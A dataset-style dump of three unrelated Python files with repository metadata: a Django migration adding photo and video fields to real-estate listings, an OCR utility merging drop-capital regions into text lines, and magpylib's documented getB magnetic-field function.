729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
real_estate_api/owner/migrations/0003_auto_20180804_1441.py
|
rossi1/RES
|
729196bfa45cc2b47acc93c49c07c7e8f0f6ea93
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0 on 2018-08-04 21:41
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('owner', '0002_auto_20180801_1657'),
]
operations = [
migrations.RemoveField(
model_name='propertylisting',
name='image',
),
migrations.AddField(
model_name='landlisting',
name='phone_five',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_four',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_three',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='phone_two',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='landlisting',
name='photo_one',
field=models.ImageField(default='', upload_to=''),
preserve_default=False,
),
migrations.AddField(
model_name='propertylisting',
name='phone_five',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_four',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_three',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='phone_two',
field=models.ImageField(blank=True, upload_to=''),
),
migrations.AddField(
model_name='propertylisting',
name='photo_one',
field=models.ImageField(default='', upload_to=''),
preserve_default=False,
),
migrations.AddField(
model_name='propertylisting',
name='videolink',
field=django.contrib.postgres.fields.ArrayField(base_field=models.URLField(blank=True), default=[], size=None),
preserve_default=False,
),
]
| 31.948052
| 123
| 0.561382
| 219
| 2,460
| 6.127854
| 0.260274
| 0.080477
| 0.188525
| 0.221311
| 0.737705
| 0.737705
| 0.737705
| 0.709389
| 0.709389
| 0.709389
| 0
| 0.017836
| 0.31626
| 2,460
| 76
| 124
| 32.368421
| 0.780024
| 0.01748
| 0
| 0.828571
| 1
| 0
| 0.124224
| 0.009524
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028571
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a69e9f589478d3ff5b76b33a29c06e7f1c74ddfd
| 26,408
|
py
|
Python
|
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
qurator/eynollah/utils/drop_capitals.py
|
jacektl/eynollah
|
d784202ae177f975c648bb6885d5a126ec14b059
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import cv2
from .contour import (
find_new_features_of_contours,
return_contours_of_image,
return_parent_contours,
)
def adhere_drop_capital_region_into_corresponding_textline(
text_regions_p,
polygons_of_drop_capitals,
contours_only_text_parent,
contours_only_text_parent_h,
all_box_coord,
all_box_coord_h,
all_found_texline_polygons,
all_found_texline_polygons_h,
kernel=None,
curved_line=False,
):
# print(np.shape(all_found_texline_polygons),np.shape(all_found_texline_polygons[3]),'all_found_texline_polygonsshape')
# print(all_found_texline_polygons[3])
cx_m, cy_m, _, _, _, _, _ = find_new_features_of_contours(contours_only_text_parent)
cx_h, cy_h, _, _, _, _, _ = find_new_features_of_contours(contours_only_text_parent_h)
cx_d, cy_d, _, _, y_min_d, y_max_d, _ = find_new_features_of_contours(polygons_of_drop_capitals)
img_con_all = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
for j_cont in range(len(contours_only_text_parent)):
img_con_all[all_box_coord[j_cont][0] : all_box_coord[j_cont][1], all_box_coord[j_cont][2] : all_box_coord[j_cont][3], 0] = (j_cont + 1) * 3
# img_con_all=cv2.fillPoly(img_con_all,pts=[contours_only_text_parent[j_cont]],color=((j_cont+1)*3,(j_cont+1)*3,(j_cont+1)*3))
# plt.imshow(img_con_all[:,:,0])
# plt.show()
# img_con_all=cv2.dilate(img_con_all, kernel, iterations=3)
# plt.imshow(img_con_all[:,:,0])
# plt.show()
# print(np.unique(img_con_all[:,:,0]))
for i_drop in range(len(polygons_of_drop_capitals)):
# print(i_drop,'i_drop')
img_con_all_copy = np.copy(img_con_all)
img_con = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_con = cv2.fillPoly(img_con, pts=[polygons_of_drop_capitals[i_drop]], color=(1, 1, 1))
# plt.imshow(img_con[:,:,0])
# plt.show()
##img_con=cv2.dilate(img_con, kernel, iterations=30)
# plt.imshow(img_con[:,:,0])
# plt.show()
# print(np.unique(img_con[:,:,0]))
img_con_all_copy[:, :, 0] = img_con_all_copy[:, :, 0] + img_con[:, :, 0]
img_con_all_copy[:, :, 0][img_con_all_copy[:, :, 0] == 1] = 0
kherej_ghesmat = np.unique(img_con_all_copy[:, :, 0]) / 3
res_summed_pixels = np.unique(img_con_all_copy[:, :, 0]) % 3
region_with_intersected_drop = kherej_ghesmat[res_summed_pixels == 1]
# region_with_intersected_drop=region_with_intersected_drop/3
region_with_intersected_drop = region_with_intersected_drop.astype(np.uint8)
# print(len(region_with_intersected_drop),'region_with_intersected_drop1')
if len(region_with_intersected_drop) == 0:
img_con_all_copy = np.copy(img_con_all)
img_con = cv2.dilate(img_con, kernel, iterations=4)
img_con_all_copy[:, :, 0] = img_con_all_copy[:, :, 0] + img_con[:, :, 0]
img_con_all_copy[:, :, 0][img_con_all_copy[:, :, 0] == 1] = 0
kherej_ghesmat = np.unique(img_con_all_copy[:, :, 0]) / 3
res_summed_pixels = np.unique(img_con_all_copy[:, :, 0]) % 3
region_with_intersected_drop = kherej_ghesmat[res_summed_pixels == 1]
# region_with_intersected_drop=region_with_intersected_drop/3
region_with_intersected_drop = region_with_intersected_drop.astype(np.uint8)
# print(np.unique(img_con_all_copy[:,:,0]))
if curved_line:
if len(region_with_intersected_drop) > 1:
sum_pixels_of_intersection = []
for i in range(len(region_with_intersected_drop)):
# print((region_with_intersected_drop[i]*3+1))
sum_pixels_of_intersection.append(((img_con_all_copy[:, :, 0] == (region_with_intersected_drop[i] * 3 + 1)) * 1).sum())
# print(sum_pixels_of_intersection)
region_final = region_with_intersected_drop[np.argmax(sum_pixels_of_intersection)] - 1
# print(region_final,'region_final')
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
try:
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = np.array(cy_t) # all_box_coord[int(region_final)][0]+np.array(cy_t)
# print(y_lines)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
# contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
# contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
# contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
except:
# print('gordun1')
pass
elif len(region_with_intersected_drop) == 1:
region_final = region_with_intersected_drop[0] - 1
# areas_main=np.array([cv2.contourArea(all_found_texline_polygons[int(region_final)][0][j] ) for j in range(len(all_found_texline_polygons[int(region_final)]))])
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = np.array(cy_t) # all_box_coord[int(region_final)][0]+np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
# plt.imshow(img_textlines)
# plt.show()
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
# contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
# contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
# print(np.shape(contours_biggest),'contours_biggest')
# print(np.shape(all_found_texline_polygons[int(region_final)][arg_min]))
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
# print(cx_t,'print')
try:
# print(all_found_texline_polygons[j_cont][0])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 0] # +all_box_coord[int(region_final)][2]
cnt_nearest[:, 0, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 0, 1] # +all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] # -all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] # -all_box_coord[int(region_final)][0]
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
# all_found_texline_polygons[int(region_final)][arg_min]=contours_biggest
except:
pass
else:
pass
##cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
###print(all_box_coord[j_cont])
###print(cx_t)
###print(cy_t)
###print(cx_d[i_drop])
###print(cy_d[i_drop])
##y_lines=all_box_coord[int(region_final)][0]+np.array(cy_t)
##y_lines[y_lines<y_min_d[i_drop]]=0
###print(y_lines)
##arg_min=np.argmin(np.abs(y_lines-y_min_d[i_drop]) )
###print(arg_min)
##cnt_nearest=np.copy(all_found_texline_polygons[int(region_final)][arg_min])
##cnt_nearest[:,0,0]=all_found_texline_polygons[int(region_final)][arg_min][:,0,0]#+all_box_coord[int(region_final)][2]
##cnt_nearest[:,0,1]=all_found_texline_polygons[int(region_final)][arg_min][:,0,1]#+all_box_coord[int(region_final)][0]
##img_textlines=np.zeros((text_regions_p.shape[0],text_regions_p.shape[1],3))
##img_textlines=cv2.fillPoly(img_textlines,pts=[cnt_nearest],color=(255,255,255))
##img_textlines=cv2.fillPoly(img_textlines,pts=[polygons_of_drop_capitals[i_drop] ],color=(255,255,255))
##img_textlines=img_textlines.astype(np.uint8)
##plt.imshow(img_textlines)
##plt.show()
##imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
##ret, thresh = cv2.threshold(imgray, 0, 255, 0)
##contours_combined,hierarchy=cv2.findContours(thresh,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)
##print(len(contours_combined),'len textlines mixed')
##areas_cnt_text=np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
##contours_biggest=contours_combined[np.argmax(areas_cnt_text)]
###print(np.shape(contours_biggest))
###print(contours_biggest[:])
##contours_biggest[:,0,0]=contours_biggest[:,0,0]#-all_box_coord[int(region_final)][2]
##contours_biggest[:,0,1]=contours_biggest[:,0,1]#-all_box_coord[int(region_final)][0]
##contours_biggest=contours_biggest.reshape(np.shape(contours_biggest)[0],np.shape(contours_biggest)[2])
##all_found_texline_polygons[int(region_final)][arg_min]=contours_biggest
else:
if len(region_with_intersected_drop) > 1:
sum_pixels_of_intersection = []
for i in range(len(region_with_intersected_drop)):
# print((region_with_intersected_drop[i]*3+1))
sum_pixels_of_intersection.append(((img_con_all_copy[:, :, 0] == (region_with_intersected_drop[i] * 3 + 1)) * 1).sum())
# print(sum_pixels_of_intersection)
region_final = region_with_intersected_drop[np.argmax(sum_pixels_of_intersection)] - 1
# print(region_final,'region_final')
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
try:
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
# print(y_lines)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0] + all_box_coord[int(region_final)][2]
cnt_nearest[:, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 1] + all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] - all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] - all_box_coord[int(region_final)][0]
contours_biggest = contours_biggest.reshape(np.shape(contours_biggest)[0], np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
except:
# print('gordun1')
pass
elif len(region_with_intersected_drop) == 1:
region_final = region_with_intersected_drop[0] - 1
# areas_main=np.array([cv2.contourArea(all_found_texline_polygons[int(region_final)][0][j] ) for j in range(len(all_found_texline_polygons[int(region_final)]))])
# cx_t,cy_t ,_, _, _ ,_,_= find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(cx_t,'print')
try:
# print(all_found_texline_polygons[j_cont][0])
cx_t, cy_t, _, _, _, _, _ = find_new_features_of_contours(all_found_texline_polygons[int(region_final)])
# print(all_box_coord[j_cont])
# print(cx_t)
# print(cy_t)
# print(cx_d[i_drop])
# print(cy_d[i_drop])
y_lines = all_box_coord[int(region_final)][0] + np.array(cy_t)
y_lines[y_lines < y_min_d[i_drop]] = 0
# print(y_lines)
arg_min = np.argmin(np.abs(y_lines - y_min_d[i_drop]))
# print(arg_min)
cnt_nearest = np.copy(all_found_texline_polygons[int(region_final)][arg_min])
cnt_nearest[:, 0] = all_found_texline_polygons[int(region_final)][arg_min][:, 0] + all_box_coord[int(region_final)][2]
cnt_nearest[:, 1] = all_found_texline_polygons[int(region_final)][arg_min][:, 1] + all_box_coord[int(region_final)][0]
img_textlines = np.zeros((text_regions_p.shape[0], text_regions_p.shape[1], 3))
img_textlines = cv2.fillPoly(img_textlines, pts=[cnt_nearest], color=(255, 255, 255))
img_textlines = cv2.fillPoly(img_textlines, pts=[polygons_of_drop_capitals[i_drop]], color=(255, 255, 255))
img_textlines = img_textlines.astype(np.uint8)
imgray = cv2.cvtColor(img_textlines, cv2.COLOR_BGR2GRAY)
ret, thresh = cv2.threshold(imgray, 0, 255, 0)
contours_combined, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# print(len(contours_combined),'len textlines mixed')
areas_cnt_text = np.array([cv2.contourArea(contours_combined[j]) for j in range(len(contours_combined))])
contours_biggest = contours_combined[np.argmax(areas_cnt_text)]
# print(np.shape(contours_biggest))
# print(contours_biggest[:])
contours_biggest[:, 0, 0] = contours_biggest[:, 0, 0] - all_box_coord[int(region_final)][2]
contours_biggest[:, 0, 1] = contours_biggest[:, 0, 1] - all_box_coord[int(region_final)][0]
contours_biggest = contours_biggest.reshape(np.shape(contours_biggest)[0], np.shape(contours_biggest)[2])
all_found_texline_polygons[int(region_final)][arg_min] = contours_biggest
except:
pass
else:
pass
return all_found_texline_polygons
def filter_small_drop_capitals_from_no_patch_layout(layout_no_patch, layout1):
    # Keep only drop-capital candidates (label 4) that look like real drop capitals:
    # large enough, roughly square, well filled, and backed by enough text (label 1)
    # relative to background (label 5) inside their bounding box.
    drop_only = (layout_no_patch[:, :, 0] == 4) * 1
    contours_drop, hir_on_drop = return_contours_of_image(drop_only)
    contours_drop_parent = return_parent_contours(contours_drop, hir_on_drop)
    areas_cnt_text = np.array([cv2.contourArea(contours_drop_parent[j]) for j in range(len(contours_drop_parent))])
    # normalize areas by the page area and discard tiny candidates
    areas_cnt_text = areas_cnt_text / float(drop_only.shape[0] * drop_only.shape[1])
    contours_drop_parent = [contours_drop_parent[jz] for jz in range(len(contours_drop_parent)) if areas_cnt_text[jz] > 0.001]
    areas_cnt_text = [areas_cnt_text[jz] for jz in range(len(areas_cnt_text)) if areas_cnt_text[jz] > 0.001]
    contours_drop_parent_final = []
    for jj in range(len(contours_drop_parent)):
        x, y, w, h = cv2.boundingRect(contours_drop_parent[jj])
        # extent of the contour inside its bounding box, in percent (not a true IoU)
        extent_of_contour_in_box = float(drop_only.shape[0] * drop_only.shape[1]) * areas_cnt_text[jj] / float(w * h) * 100
        height_to_width_ratio = h / float(w)
        width_to_height_ratio = w / float(h)
        if extent_of_contour_in_box > 60 and width_to_height_ratio < 1.2 and height_to_width_ratio < 2:
            map_of_drop_contour_bb = np.zeros((layout1.shape[0], layout1.shape[1]))
            map_of_drop_contour_bb[y : y + h, x : x + w] = layout1[y : y + h, x : x + w]
            # require at least 15% text pixels (label 1) relative to background pixels (label 5) in the box
            if (((map_of_drop_contour_bb == 1) * 1).sum() / float(((map_of_drop_contour_bb == 5) * 1).sum()) * 100) >= 15:
                contours_drop_parent_final.append(contours_drop_parent[jj])
    # clear the old drop-capital label and repaint only the accepted candidates
    layout_no_patch[:, :, 0][layout_no_patch[:, :, 0] == 4] = 0
    layout_no_patch = cv2.fillPoly(layout_no_patch, pts=contours_drop_parent_final, color=(4, 4, 4))
    return layout_no_patch
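# Illustrative sketch (not part of the module): how this filter is typically wired into a
# layout pipeline. The array names below are hypothetical stand-ins for the caller's data;
# `regions_no_patch` and `regions_full` are assumed to be HxWx3 label maps where 4 marks
# drop-capital candidates, 1 marks text and 5 marks background.
#
#     regions_no_patch = filter_small_drop_capitals_from_no_patch_layout(regions_no_patch, regions_full)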
| 52.605578
| 177
| 0.62057
| 3,555
| 26,408
| 4.200563
| 0.044726
| 0.085381
| 0.066564
| 0.084712
| 0.912074
| 0.883011
| 0.864997
| 0.842697
| 0.822541
| 0.802451
| 0
| 0.030102
| 0.245229
| 26,408
| 501
| 178
| 52.710579
| 0.719095
| 0.331415
| 0
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010417
| false
| 0.03125
| 0.015625
| 0
| 0.036458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4725e024171d412c830465b7e9e9c89d2a8d0788
| 12,938
|
py
|
Python
|
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
magpylib/_src/fields/field_wrap_BH_level3.py
|
OrtnerMichael/magPyLib
|
4c7e7f56f6e0b915ec0e024c172c460fa80126e5
|
[
"BSD-2-Clause"
] | null | null | null |
from magpylib._src.fields.field_wrap_BH_level2 import getBH_level2
def getB(
sources=None, observers=None, sumup=False, squeeze=True, pixel_agg=None, **kwargs
):
"""Compute B-field in [mT] for given sources and observers.
Field implementations can be directly accessed (avoiding the object oriented
Magpylib interface) by providing a string input `sources=source_type`, array_like
positions as `observers` input, and all other necessary input parameters (see below)
as kwargs.
Parameters
----------
sources: source and collection objects or 1D list thereof
Sources that generate the magnetic field. Can be a single source (or collection)
or a 1D list of l source and/or collection objects.
Direct interface: input must be one of (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`,
`'Sphere'`, `'Dipole'`, `'Loop'` or `'Line'`).
observers: array_like or (list of) `Sensor` objects
Can be array_like positions of shape (n1, n2, ..., 3) where the field
should be evaluated, a `Sensor` object with pixel shape (n1, n2, ..., 3) or a list
of such sensor objects (must all have similar pixel shapes). All positions
are given in units of [mm].
Direct interface: Input must be array_like with shape (3,) or (n,3), corresponding
to observer positions in units of [mm].
sumup: bool, default=`False`
If `True`, the fields of all sources are summed up.
squeeze: bool, default=`True`
If `True`, the output is squeezed, i.e. all axes of length 1 in the output (e.g. only
a single sensor or only a single source) are eliminated.
pixel_agg: str, default=`None`
Reference to a compatible numpy aggregator function like `'min'` or `'mean'`,
which is applied to observer output values, e.g. mean of all sensor pixel outputs.
With this option, observer inputs with different (pixel) shapes are allowed.
Other Parameters (Direct interface)
-----------------------------------
position: array_like, shape (3,) or (n,3), default=`(0,0,0)`
Source position(s) in the global coordinates in units of [mm].
orientation: scipy `Rotation` object with length 1 or n, default=`None`
Object orientation(s) in the global coordinates. `None` corresponds to
a unit-rotation.
magnetization: array_like, shape (3,) or (n,3)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`, `'Sphere'`)!
Magnetization vector(s) (mu0*M, remanence field) in units of [kA/m] given in
the local object coordinates (rotates with object).
moment: array_like, shape (3) or (n,3), unit [mT*mm^3]
Only source_type == `'Dipole'`!
Magnetic dipole moment(s) in units of [mT*mm^3] given in the local object coordinates
(rotates with object). For homogeneous magnets the relation moment=magnetization*volume
holds.
current: array_like, shape (n,)
Only source_type == `'Loop'` or `'Line'`!
Electrical current in units of [A].
dimension: array_like, shape (x,) or (n,x)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`)!
Magnet dimension input in units of [mm] and [deg]. Dimension format x of sources is the same
as in the object-oriented interface.
diameter: array_like, shape (n,)
Only source_type == `'Sphere'` or `'Loop'`!
Diameter of source in units of [mm].
segment_start: array_like, shape (n,3)
Only source_type == `'Line'`!
Start positions of line current segments in units of [mm].
segment_end: array_like, shape (n,3)
Only source_type == `'Line'`!
End positions of line current segments in units of [mm].
Returns
-------
B-field: ndarray, shape squeeze(m, k, n1, n2, ..., 3)
B-field at each path position (m) for each sensor (k) and each sensor pixel
position (n1, n2, ...) in units of [mT]. Sensor pixel positions are equivalent
to simple observer positions. Paths of objects that are shorter than m will be
considered as static beyond their end.
Direct interface: ndarray, shape (n,3)
B-field for every parameter set in units of [mT].
Notes
-----
This function automatically joins all sensor and position inputs together and groups
similar sources for optimal vectorization of the computation. For maximal performance
call this function as little as possible and avoid using it in loops.
Examples
--------
In this example we compute the B-field [mT] of a spherical magnet and a current loop
at the observer position (1,1,1) given in units of [mm]:
>>> import magpylib as magpy
>>> src1 = magpy.current.Loop(current=100, diameter=2)
>>> src2 = magpy.magnet.Sphere(magnetization=(0,0,100), diameter=1)
>>> B = magpy.getB([src1, src2], (1,1,1))
>>> print(B)
[[6.23597388e+00 6.23597388e+00 2.66977810e+00]
[8.01875374e-01 8.01875374e-01 1.48029737e-16]]
We can also use sensor objects as observers input:
>>> sens1 = magpy.Sensor(position=(1,1,1))
>>> sens2 = sens1.copy(position=(1,1,-1))
>>> B = magpy.getB([src1, src2], [sens1, sens2])
>>> print(B)
[[[ 6.23597388e+00 6.23597388e+00 2.66977810e+00]
[-6.23597388e+00 -6.23597388e+00 2.66977810e+00]]
<BLANKLINE>
[[ 8.01875374e-01 8.01875374e-01 1.48029737e-16]
[-8.01875374e-01 -8.01875374e-01 1.48029737e-16]]]
Through the direct interface we can compute the same fields for the loop as:
>>> obs = [(1,1,1), (1,1,-1)]
>>> B = magpy.getB('Loop', obs, current=100, diameter=2)
>>> print(B)
[[ 6.23597388 6.23597388 2.6697781 ]
[-6.23597388 -6.23597388 2.6697781 ]]
But also for a set of four completely different instances:
>>> B = magpy.getB(
... 'Loop',
... observers=((1,1,1), (1,1,-1), (1,2,3), (2,2,2)),
... current=(11, 22, 33, 44),
... diameter=(1, 2, 3, 4),
... position=((0,0,0), (0,0,1), (0,0,2), (0,0,3)),
... )
>>> print(B)
[[ 0.17111325 0.17111325 0.01705189]
[-0.38852048 -0.38852048 0.49400758]
[ 1.14713551 2.29427102 -0.22065346]
[-2.48213467 -2.48213467 -0.79683487]]
"""
return getBH_level2(
sources,
observers,
sumup=sumup,
squeeze=squeeze,
pixel_agg=pixel_agg,
field="B",
**kwargs
)
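# Illustrative sketch (not part of the library source): per the Notes section above, one
# vectorized call over many observer positions is preferable to calling getB inside a loop.
# The grid and magnet parameters below are made-up example values.
#
#     import numpy as np
#     import magpylib as magpy
#     src = magpy.magnet.Sphere(magnetization=(0, 0, 100), diameter=1)
#     grid = np.mgrid[-2:2:10j, -2:2:10j, 1:1:1j].reshape(3, -1).T   # (100, 3) positions in [mm]
#     B = magpy.getB(src, grid)                                      # one call, returns shape (100, 3)
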